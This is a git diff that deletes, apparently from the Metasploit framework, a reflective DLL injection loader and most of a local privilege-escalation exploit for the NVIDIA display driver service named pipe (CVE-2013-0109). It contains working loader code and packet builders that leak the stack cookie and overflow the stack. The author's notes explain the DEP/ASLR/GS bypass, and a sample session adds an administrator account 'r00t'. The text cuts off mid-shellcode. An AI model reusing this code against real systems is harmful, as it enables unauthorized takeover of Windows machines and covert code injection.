-	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
-	uiValueB = uiLibraryAddress;
-	uiValueC = uiBaseAddress;
-
-	while( uiValueA-- )
-		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
-
-	// STEP 3: load in all of our sections...
-
-	// uiValueA = the VA of the first section
-	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-	
-	// itterate through all sections, loading them into memory.
-	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
-	while( uiValueE-- )
-	{
-		// uiValueB is the VA for this section
-		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
-		// uiValueC if the VA for this sections data
-		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
-		// copy the section over
-		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
-
-		while( uiValueD-- )
-			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
-
-		// get the VA of the next section
-		uiValueA += sizeof( IMAGE_SECTION_HEADER );
-	}
-
-	// STEP 4: process our images import table...
-
-	// uiValueB = the address of the import directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-	
-	// we assume their is an import table to process
-	// uiValueC is the first entry in the import table
-	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-	
-	// itterate through all imports
-	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
-	{
-		// use LoadLibraryA to load the imported module into memory
-		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
-		// uiValueD = VA of the OriginalFirstThunk
-		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-	
-		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
-		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
-		// itterate through all imported functions, importing by ordinal if no name present
-		while( DEREF(uiValueA) )
-		{
-			// sanity check uiValueD as some compilers only import by FirstThunk
-			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
-			{
-				// get the VA of the modules NT Header
-				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
-				// uiNameArray = the address of the modules export directory entry
-				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-				// get the VA of the export directory
-				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
-				// get the VA for the array of addresses
-				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
-				// use the import ordinal (- export ordinal base) as an index into the array of addresses
-				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
-				// patch in the address for this imported function
-				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
-			}
-			else
-			{
-				// get the VA of this functions import by name struct
-				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
-				// use GetProcAddress and patch in the address for this imported function
-				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
-			}
-			// get the next imported function
-			uiValueA += sizeof( ULONG_PTR );
-			if( uiValueD )
-				uiValueD += sizeof( ULONG_PTR );
-		}
-
-		// get the next import
-		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
-	}
-
-	// STEP 5: process all of our images relocations...
-
-	// calculate the base address delta and perform relocations (even if we load at desired image base)
-	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
-	// uiValueB = the address of the relocation directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
-	// check if their are any relocations present
-	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
-	{
-		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
-		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
-		// and we itterate through all entries...
-		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
-		{
-			// uiValueA = the VA for this relocation block
-			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
-			// uiValueB = number of entries in this relocation block
-			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
-			// uiValueD is now the first entry in the current relocation block
-			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
-			// we itterate through all the entries in the current block...
-			while( uiValueB-- )
-			{
-				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
-				// we dont use a switch statement to avoid the compiler building a jump table
-				// which would not be very position independent!
-				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
-					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
-					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
-#ifdef WIN_ARM
-				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
-				{	
-					register DWORD dwInstruction;
-					register DWORD dwAddress;
-					register WORD wImm;
-					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
-					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
-					// flip the words to get the instruction as expected
-					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					// sanity chack we are processing a MOV instruction...
-					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
-					{
-						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
-						wImm  = (WORD)( dwInstruction & 0x000000FF);
-						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
-						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
-						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
-						// apply the relocation to the target address
-						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
-						// now create a new instruction with the same opcode and register param.
-						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
-						// patch in the relocated address...
-						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
-						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
-						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
-						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
-						// now flip the instructions words and patch back into the code...
-						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					}
-				}
-#endif
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
-				// get the next entry in the current relocation block
-				uiValueD += sizeof( IMAGE_RELOC );
-			}
-
-			// get the next entry in the relocation directory
-			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
-		}
-	}
-
-	// STEP 6: call our images entry point
-
-	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
-	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
-	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
-	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
-
-	// call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
-	// if we are injecting an DLL via a stub we call DllMain with no parameter
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
-	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
-	return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
deleted file mode 100644
index 3797879e47..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
+++ /dev/null
@@ -1,203 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-#include <Winsock2.h>
-#include <intrin.h>
-
-#include "ReflectiveDLLInjection.h"
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH				0x6A4ABC5B
-#define NTDLLDLL_HASH					0x3CFA685D
-
-#define LOADLIBRARYA_HASH				0xEC0E4E8E
-#define GETPROCADDRESS_HASH				0x7C0DFCAA
-#define VIRTUALALLOC_HASH				0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
-
-#define IMAGE_REL_BASED_ARM_MOV32A		5
-#define IMAGE_REL_BASED_ARM_MOV32T		7
-
-#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
-#define ARM_MOVW						0xF2400000
-#define ARM_MOVT						0xF2C00000
-
-#define HASH_KEY						13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
-	return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD hash( char * c )
-{
-    register DWORD h = 0;
-	do
-	{
-		h = ror( h );
-        h += *c;
-	} while( *++c );
-
-    return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
-  USHORT Length;
-  USHORT MaximumLength;
-  PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) ) 
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
-	LIST_ENTRY InMemoryOrderModuleList;
-	LIST_ENTRY InInitializationOrderModuleList;
-	PVOID DllBase;
-	PVOID EntryPoint;
-	ULONG SizeOfImage;
-	UNICODE_STR FullDllName;
-	UNICODE_STR BaseDllName;
-	ULONG Flags;
-	SHORT LoadCount;
-	SHORT TlsIndex;
-	LIST_ENTRY HashTableEntry;
-	ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
-   DWORD dwLength;
-   DWORD dwInitialized;
-   LPVOID lpSsHandle;
-   LIST_ENTRY InLoadOrderModuleList;
-   LIST_ENTRY InMemoryOrderModuleList;
-   LIST_ENTRY InInitializationOrderModuleList;
-   LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
-   struct _PEB_FREE_BLOCK * pNext;
-   DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
-   BYTE bInheritedAddressSpace;
-   BYTE bReadImageFileExecOptions;
-   BYTE bBeingDebugged;
-   BYTE bSpareBool;
-   LPVOID lpMutant;
-   LPVOID lpImageBaseAddress;
-   PPEB_LDR_DATA pLdr;
-   LPVOID lpProcessParameters;
-   LPVOID lpSubSystemData;
-   LPVOID lpProcessHeap;
-   PRTL_CRITICAL_SECTION pFastPebLock;
-   LPVOID lpFastPebLockRoutine;
-   LPVOID lpFastPebUnlockRoutine;
-   DWORD dwEnvironmentUpdateCount;
-   LPVOID lpKernelCallbackTable;
-   DWORD dwSystemReserved;
-   DWORD dwAtlThunkSListPtr32;
-   PPEB_FREE_BLOCK pFreeList;
-   DWORD dwTlsExpansionCounter;
-   LPVOID lpTlsBitmap;
-   DWORD dwTlsBitmapBits[2];
-   LPVOID lpReadOnlySharedMemoryBase;
-   LPVOID lpReadOnlySharedMemoryHeap;
-   LPVOID lpReadOnlyStaticServerData;
-   LPVOID lpAnsiCodePageData;
-   LPVOID lpOemCodePageData;
-   LPVOID lpUnicodeCaseTableData;
-   DWORD dwNumberOfProcessors;
-   DWORD dwNtGlobalFlag;
-   LARGE_INTEGER liCriticalSectionTimeout;
-   DWORD dwHeapSegmentReserve;
-   DWORD dwHeapSegmentCommit;
-   DWORD dwHeapDeCommitTotalFreeThreshold;
-   DWORD dwHeapDeCommitFreeBlockThreshold;
-   DWORD dwNumberOfHeaps;
-   DWORD dwMaximumNumberOfHeaps;
-   LPVOID lpProcessHeaps;
-   LPVOID lpGdiSharedHandleTable;
-   LPVOID lpProcessStarterHelper;
-   DWORD dwGdiDCAttributeList;
-   LPVOID lpLoaderLock;
-   DWORD dwOSMajorVersion;
-   DWORD dwOSMinorVersion;
-   WORD wOSBuildNumber;
-   WORD wOSCSDVersion;
-   DWORD dwOSPlatformId;
-   DWORD dwImageSubsystem;
-   DWORD dwImageSubsystemMajorVersion;
-   DWORD dwImageSubsystemMinorVersion;
-   DWORD dwImageProcessAffinityMask;
-   DWORD dwGdiHandleBuffer[34];
-   LPVOID lpPostProcessInitRoutine;
-   LPVOID lpTlsExpansionBitmap;
-   DWORD dwTlsExpansionBitmapBits[32];
-   DWORD dwSessionId;
-   ULARGE_INTEGER liAppCompatFlags;
-   ULARGE_INTEGER liAppCompatFlagsUser;
-   LPVOID lppShimData;
-   LPVOID lpAppCompatInfo;
-   UNICODE_STR usCSDVersion;
-   LPVOID lpActivationContextData;
-   LPVOID lpProcessAssemblyStorageMap;
-   LPVOID lpSystemDefaultActivationContextData;
-   LPVOID lpSystemAssemblyStorageMap;
-   DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
-	WORD	offset:12;
-	WORD	type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp b/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
deleted file mode 100644
index d97f113401..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
+++ /dev/null
@@ -1,537 +0,0 @@
-/*
- 
-NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
-- Bypass DEP + ASLR + /GS + CoE
-=============================================================
-(@peterwintrsmith)
- 
- ** Initial release 25/12/12
- ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
-      @seanderegge!
- 
-Hey all!
- 
-Here is an interesting exploit for a stack buffer overflow in the NVidia
-Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
-which has a NULL DACL configured, which should mean that any logged on user
-or remote user in a domain context (Windows firewall/file sharing
-permitting) should be able to exploit this vulnerability.
- 
-The buffer overflow occurs as a result of a bad memmove operation, with the
-stack layout effectively looking like this:
- 
-[locals]
-[received-data]
-[response-buf]
-[stack cookie]
-[return address]
-[arg space]
-[etc]
- 
-The memmove copies data from the received-data buffer into the response-buf
-buffer, unchecked. It is possible to control the offset from which the copy
-starts in the received-data buffer by embedding a variable length string -
-which forms part of the protocol message being crafted - as well as the
-number of bytes copied into the response buffer.
- 
-The amount of data sent back over the named pipe is related to the number
-of bytes copied rather than the maximum number of bytes that the buffer is
-able to safely contain, so it is possible to leak stack data by copying
-from the end of the received-data buffer, through the response-buf buffer
-(which is zeroed first time round, and second time round contains whatever
-was in it beforehand), right to the end of the stack frame (including stack
-cookie and return address).
- 
-As the entire block of data copied is sent back, the stack cookie and
-nvvsvc.exe base can be determined using the aforementioned process. The
-stack is then trashed, but the function servicing pipe messages won't
-return until the final message has been received, so it doesn't matter too
-much.
- 
-It is then possible to exploit the bug by sending two further packets of
-data: One containing the leaked stack cookie and a ROP chain dynamically
-generated using offsets from the leaked nvvsvc.exe base (which simply fills
-the response-buf buffer when this data is echoed back) and a second packet
-which contains enough data to trigger an overwrite if data is copied from
-the start of the received-data buffer into the response-buf (including the
-data we primed the latter to contain - stack cookie and ROP chain).
- 
-Allowing the function to then return leads to execution of our ROP chain,
-and our strategically placed Metasploit net user /add shellcode! We get
-continuation of execution for free because the process spins up a thread
-to handle each new connection, and there are no deadlocks etc.
- 
-I've included two ROP chains, one which works against the nvvsvc.exe
-running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
-from the Dell site, and one which works against the latest version of the
-drivers for the same card, from:
-http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
-http://www.geforce.co.uk/drivers/results/54709
- 
-Hope you find this interesting - it's a fun bug to play with!
- 
-- Sample Session - 
- 
- 
-C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
-Alias name     administrators
-Comment        Administrators have complete and unrestricted access to the computer/domain
- 
-Members
- 
--------------------------------------------------------------------------------
-Administrator
-Peter
-The command completed successfully.
- 
- 
-C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
-  ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
-                 [@peterwintrsmith]
- - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
- 
-        Action 1 of 9:  - CONNECT
- 
-        Action 2 of 9:  - CLIENT => SERVER
-                Written 16416 (0x4020) characters to pipe
- 
-        Action 3 of 9:   - SERVER => CLIENT
-                Read 16504 (0x4078) characters from pipe
- 
-        Action 4 of 9: Building exploit ...
-                 => Stack cookie 0xe2e2893340d4:
-                 => nvvsvc.exe base 0x13fb90000:
- 
-        Action 5 of 9:  - CLIENT => SERVER
-                Written 16416 (0x4020) characters to pipe
- 
-        Action 6 of 9:   - SERVER => CLIENT
-                Read 16384 (0x4000) characters from pipe
- 
-        Action 7 of 9:  - CLIENT => SERVER
-                Written 16416 (0x4020) characters to pipe
- 
-        Action 8 of 9:   - SERVER => CLIENT
-                Read 16896 (0x4200) characters from pipe
- 
-        Action 9 of 9:  - DISCONNECT
- 
-C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
-Alias name     administrators
-Comment        Administrators have complete and unrestricted access to the computer/domain
- 
-Members
- 
--------------------------------------------------------------------------------
-Administrator
-Peter
-r00t
-The command completed successfully.
- 
- 
-C:\Users\Peter\Desktop\NVDelMe1>
- 
-*/
-
-#include <stdio.h>
-#include <Windows.h>
-#define SCSIZE 2048
-char code[SCSIZE] = "PAYLOAD:";
-
-enum EProtocolAction
-{
-    ProtocolAction_Connect = 0,
-    ProtocolAction_Receive,
-    ProtocolAction_Send,
-    ProtocolAction_Disconnect,
-    ProtocolAction_ReadCookie,
-};
-
-typedef struct {
-    EProtocolAction Action;
-    PBYTE Buf;
-    DWORD Length;
-} ProtocolMessage;
-
-const int GENERIC_BUF_LENGTH = 0x10000;
-
-#define WriteByte(val)    {buf[offs] = val; offs += 1;}
-#define WriteWord(val)    {*(WORD *)(buf + offs) = val; offs += 2;}
-#define WriteDword(val)    {*(DWORD *)(buf + offs) = val; offs += 4;}
-#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
-#define BufRemaining()    (sizeof(buf) - offs)
-
-DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
-{
-    DWORD dwWritten = 0;
-
-    if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
-        return dwWritten;
-
-    return 0;
-}
-
-DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
-{
-    DWORD dwRead = 0, dwAvailable = 0;
-
-    if(bTimeout)
-    {
-        for(DWORD i=0; i < 30; i++)
-        {
-            if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
-                goto Cleanup;
-
-            if(dwAvailable)
-                break;
-
-            Sleep(100);
-        }
-
-        if(!dwAvailable)
-            goto Cleanup;
-    }
-
-    if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
-        goto Cleanup;
-
-Cleanup:
-    return dwRead;
-}
-
-HANDLE EstablishPipeConnection(char *pszPipe)
-{
-    HANDLE hPipe = CreateFileA(
-            pszPipe,
-            GENERIC_READ | GENERIC_WRITE,
-            0,
-            NULL,
-            OPEN_EXISTING,
-            0,
-            NULL
-        );
-
-    if(hPipe == INVALID_HANDLE_VALUE)
-    {
-        return NULL;
-    }
-
-    return hPipe;
-}
-
-BYTE *BuildMalicious_LeakStack()
-{
-    static BYTE buf[0x4020] = {0};
-    UINT offs = 0;
-
-    WriteWord(0x52);
-
-    for(UINT i=0; i<0x2000; i++)
-        WriteWord(0x41);
-
-    WriteWord(0);
-
-    WriteDword(0);
-    WriteDword(0x4078);
-
-    WriteDword(0x41414141);
-    WriteDword(0x41414141);
-    WriteDword(0x41414141);
-    WriteDword(0x41414141);
-    WriteDword(0x41414141);
-
-    return buf;
-}
-
-BYTE *BuildMalicious_FillBuf()
-{
-    static BYTE buf[0x4020] = {0};
-    UINT offs = 0;
-
-    WriteWord(0x52);
-    WriteWord(0); // string
-
-    WriteDword(0);
-    WriteDword(0x4000);
-
-    while(BufRemaining())
-        WriteDword(0x43434343);
-
-    return buf;
-}
-
-BYTE *BuildMalicious_OverwriteStack()
-{
-    static BYTE buf[0x4020] = {0};
-    UINT offs = 0;
-
-    WriteWord(0x52);
-    WriteWord(0); // string
-
-    WriteDword(0);
-    WriteDword(0x4340); // enough to copy shellcode too
-
-    while(BufRemaining())
-        WriteDword(0x42424242);
-
-    return buf;
-}
-
-extern "C" int run()
-{
-    DWORD dwReturnCode = 1, dwBytesInOut = 0;
-    HANDLE hPipe = NULL;
-
-    static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0};
-
-    memset(rgReadBuf, 0, sizeof(rgReadBuf));
-
-    ProtocolMessage rgConvoMsg[] = {
-        {ProtocolAction_Connect, NULL, 0},
-        {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020},
-        {ProtocolAction_Receive, {0}, 0x4200},
-        {ProtocolAction_ReadCookie, {0}, 0},
-        {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020},
-        {ProtocolAction_Receive, {0}, 0x4000},
-        {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020},
-        {ProtocolAction_Receive, {0}, 0x4200},
-        {ProtocolAction_Disconnect, NULL, 0},
-    };
-
-    DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
-    BOOL bTryAgain = FALSE;
-    char szPipe[256] = {0};
-
-	// We could renable remote hosts to target other devices on network?!
-    //if(stricmp(argv[1], "local") == 0)
-    strcpy(szPipe, "\\\\.\\pipe\\nvsr");
-    //else
-    //    sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
-
-    while(i < dwNumberOfMessages)
-    {
-        printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
-
-        switch(rgConvoMsg[i].Action)
-        {
-        case ProtocolAction_Connect:
-            printf(" - CONNECT\n");
-
-            hPipe = EstablishPipeConnection(szPipe);
-            if(!hPipe)
-            {
-                printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
-                goto Cleanup;
-            }
-
-            break;
-        case ProtocolAction_Disconnect:
-            printf(" - DISCONNECT\n");
-
-            CloseHandle(hPipe);
-            hPipe = NULL;
-
-            break;
-        case ProtocolAction_Send:
-            printf(" - CLIENT => SERVER\n");
-
-            if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
-            {
-                printf("!! Error writing to pipe\n");
-                goto Cleanup;
-            }
-
-            printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
-
-            break;
-        case ProtocolAction_Receive:
-            printf("\t - SERVER => CLIENT\n");
-
-            if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
-            {
-                printf("!! Error reading from pipe (at least, no data on pipe)\n");
-                goto Cleanup;
-            }
-
-            printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
-
-            break;
-        case ProtocolAction_ReadCookie:
-
-            // x64 Metasploit cmd/exec:
-            //     "net user r00t r00t00r! /add & net localgroup administrators /add" 
-            //     exitfunc=thread
-            /*char code[] = "" 
-                "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 
-                "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 
